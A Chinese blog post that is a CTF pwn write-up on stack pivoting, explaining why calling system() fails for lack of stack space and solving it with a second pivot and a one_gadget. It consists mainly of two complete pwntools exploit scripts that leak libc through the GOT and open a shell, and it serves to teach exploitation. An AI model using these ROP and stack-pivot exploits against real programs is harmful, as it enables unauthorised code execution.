记一次栈迁移执行system函数时,栈空间不足的题

最新推荐文章于 2024-07-20 09:08:34 发布
最新推荐文章于 2024-07-20 09:08:34 发布
阅读量143 收藏
点赞数
文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao78777/article/details/129229751
版权

这个题在桌面上,但是忘了是哪个比赛的了,闲来无事,又重新做了一次,收获颇多
题目的程序很简单
在这里插入图片描述在这里插入图片描述在这里插入图片描述

一看就是栈迁移的题目
再看一下保护

在这里插入图片描述
经典保护。
按照普通栈迁移的思路应该就是,第一次read读入rop链子,第二次读入使程序迁移到rop链子上去
也就是

from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
p=process("./overflow")
elf=ELF("./overflow")
libc=ELF("./libc-2.31.so")

pop=0x00000000004007a3
leave=0x0000000000400718
ret=leave+1
pop_rbp=0x00000000004005d0
vuln=0x4006C7
bss=0x6010A0+0x200
def d():
	gdb.attach(p)
	pause()

p.recvuntil("input your name:\n")
payload = b'a'*(0x200)+p64(pop)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(vuln)    #p64(pop_rbp)    #p64(0x601f00)+p64(0x4006fc)
p.send(payload)

p.recvuntil("input your data:\n")
pay=b'a'*0x70+p64(bss-8)+p64(leave)
p.send(pay)

puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
one_gad=libc_base+0xe3b01
#pop_rdx=libc_base+0x0000000000142c92
#libc_base = read_addr - libc.symbols['read']
system = libc_base+libc.symbols['system']
bin_sh = libc_base+libc.search(b"/bin/sh").__next__()
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

'''
p.recvuntil("input your name:\n")
p.send(str("1"))

p.recvuntil("input your data:\n")
pay=b'a'*0x78+p64(pop)+p64(bin_sh)+p64(ret)+p64(system) 
#d()
p.send(pay)
p.interactive()

但是实际执行的时候会出现这种情况
在这里插入图片描述
那么既然只能执行一次,那就用onegadget,试过之后,会发现
在这里插入图片描述
执行到了不能访问的空间,所以这个应该就是行不通的了

那就换一种思路,执行两次栈迁移

from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
p=process("./overflow")
elf=ELF("./overflow")
libc=ELF("./libc-2.31.so")

pop=0x00000000004007a3
leave=0x0000000000400718
ret=leave+1
pop_rbp=0x00000000004005d0
vuln=0x4006C7
bss=0x6010A0+0x200
#p=remote("node4.buuoj.cn",27194)
def d():
	gdb.attach(p)
	pause()

p.recvuntil("input your name:\n")
payload = b'a'*(0x200)+p64(pop)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(pop_rbp)+p64(0x601f00)+p64(0x4006fc)#这里修改rbp只是为了下面读入的时候,读入到我们想让它去的地方
p.send(payload)

p.recvuntil("input your data:\n")
pay=b'a'*0x70+p64(bss-8)+p64(leave)
p.send(pay)

puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
one_gad=libc_base+0xe3b01
pop_rdx=libc_base+0x0000000000142c92
#libc_base = read_addr - libc.symbols['read']
system = libc_base+libc.symbols['system']
bin_sh = libc_base+libc.search(b"/bin/sh").__next__()
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

'''
'''
#pause()
p.recvuntil("input your name:\n")
payload = b'a'*(0x90)+p64(0x4006f2)*2+p64(one_gad)*4
p.send(str("1"))

p.recvuntil("input your data:\n")
pay=b'a'*0x78+p64(one_gad)*4
d()

p.send(pay)
'''

pay3 = (p64(0)+p64(pop_rdx)+p64(0)+p64(one_gad)*4).ljust(0x70,b'\x00')+p64(0x601e90)+p64(leave)   #常规栈溢出,修改返回地址,再次实现栈迁移
#pay3+=pay3.ljust(0x70,b'\x00')+p64(0x601e90)+p64(leave)
#pay3=b'a'*0x70+b'b'*0x10
#d()
p.send(pay3)
p.interactive()

这个就是通过pop rbx把rbx修改成0x601f00,再去进入到
在这里插入图片描述
将读入的内容写到0x601f00-0x70的地方去,再利用下面的leave ret栈迁移到前面的地方去,我们在前面的地方写入我们的rop链
这样栈的空间就足够了
可以最后一个链子可以选择常用的system(“/bin/sh”),
这里我用的是onegadget,但是满足条件的没找到,那就构造满足条件的
第二个r15可以看到是0,但是rdx不为0,那就用libc找到pop rdx ret
在这里插入图片描述
这样就能满足onegadget的条件getshell了

在这里插入图片描述

绿 宝 石
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kuka高级函数及其作用.docx
07-09
在KUKA机器人系统中,高级函数是实现自动化任务的关键组成部分。这些函数涵盖了从系统状态查询、故障处理到运动学转换等多种功能。以下是对部分重要函数的详细解释: 1. **GET_SYSTEM_DATA**: 这个函数用于获取与轴...
OSError:[Errno 4]Interrupted system call
12-22
`EINTR`通常意味着系统调用在执行被信号(signal)中断。在Python中,这可能是因为程序接收到一个信号(比如SIGINT,即Ctrl+C)或者系统资源暂不可用。在多线程或多进程环境中,这种中断是可能的,因为信号处理...
[Black Watch 入群]PWN-迁移
个人笔记
04-20 367
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
pwn-迁移-ROP
leeham的博客
08-23 4020
# 迁移-ROP 目描述 这里给出目链接 https://github.com/LeeHaming/CTF-learn/blob/master/easyR0p/easyR0p 程序的结构很简单,main()函数中有一个while(1)的循环,循环中rop()函数执行。 rop()中有明显的溢出,最开始给s申请的内存空间为:0x40;然而read()可以读入0x50字节。 于是就...
内存不足导致不能执行 system
bubbleyang的博客
11-23 523
至此,问已基本明确,确实是由于挪动内存后,CPUL 上的剩余内存不足以 fork。其中方案 1 存在一定的风险,因为内存的使用是动态的,如果分回来的过多,可能导致 CPUH 再次出现偶尔升级失败,如果分过来的不够,则有可能出现 CPUL 调用 system 失败,因此,这里主要考虑使用方案 2。考虑到我们的代码中出了 system 外,并没有 fork 的需求,而且 system 在执行 fork 后会立即调用 exec 释放掉申请的空间,因此我们将 overcommit_memory 设置为 1。
内存不足导致不能执行system
weixin_33834075的博客
03-28 973
2019独角兽企业重金招聘Python工程师标准>>> ...
迁移原理介绍与应用
weixin_39529207的博客
02-20 4891
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问将不再困扰你: 什么是迁移迁移解决了什么问? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
oracle数据库期末考试试及答案(一).docx
07-10
7. **默认表空间**:如果没有指定默认表空间,Oracle会将用户分配到SYSTEM表空间。 8. **数据字典**:Oracle的数据字典存储在SYSTEM和SYS模式下,包含了数据库的各种元数据信息。 9. **NVL函数**:在SQL查询中,...
System Generator的设计实例.7z
01-22
1. **MATLAB与System Generator接口**:System Generator作为一个MATLAB的外挂工具,提供了一个直观的图形用户界面(GUI)和一系列的MATLAB函数,使得用户能够方便地在MATLAB环境中创建和仿真FPGA设计。这包括导入...
oracle数据库期末考试试及答案(一).pdf
10-30
Oracle数据库期末考试试涉及到多个知识点,包括SQL查询优化、数据库对象、表空间管理、间日期函数、用户模式、连接操作、游标管理、数据传输、事务处理、性能调整等。 1. **SQL查询优化**: - `EXPLAIN PLAN` ...
Linux -软件安装
z2331198564653的博客
07-18 875
项目开发好需要部署,而项目本身可能依赖其他软件。这在部署项目就需要安装依赖的软件。比如: jdk mysql tomcat redis rabbitmq es等。
Linux中的环境变量
qhy850716的博客
07-17 561
我们思考这样一个问:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux就已经被加载到bash中了,也就是内存。
linux学习笔整理: 关于linux:Shell脚本 2024/7/20;
最新发布
gzx233的博客
07-20 852
Shell脚本的使用
Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 963
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
Linux 权限
includemainprinf的博客
07-18 672
Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1119
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
Linux】深入探索`cp`命令:文件复制的全面指南
lph159的博客
07-18 384
cp命令用于复制文件或目录的内容。cp [选项] 源文件 目标文件或目录使用cp命令可以在文件系统中创建新的副本,无论是单个文件还是整个目录树。接下来我们将详细介绍cp命令的各个选项及其用法。
Linux HOOK机制与Netfilter HOOK
Flashing-C的博客
07-18 770
在计算机中基本所有的软件程序都可以通过hook方式进行行为拦截,hook方式就是改变原始的执行流。 Linux常见的HOOK方式:1、修改函数指针。2、用户态动态库拦截。①利用环境变量LD_PRELOAD和预装载机制进行HOOK;②利用函数ptrace可实现对已运行的程序进行HOOK;3、内核态系统调用拦截。通过修改全局系统调用表,对系统调用进行劫持;4、堆式文件系统拦截。5、LSM。6、Netfilter HOOK。
Oracle到MySQL迁移实战:表与序列移植指南
总结来说,Oracle到MySQL的迁移是一项涉及多方面的工作,需要细心规划和执行。MySQL Migration Toolkit提供了一个基础平台,但整个迁移过程仍需结合人工干预和定制化处理,以确保数据完整性和系统稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值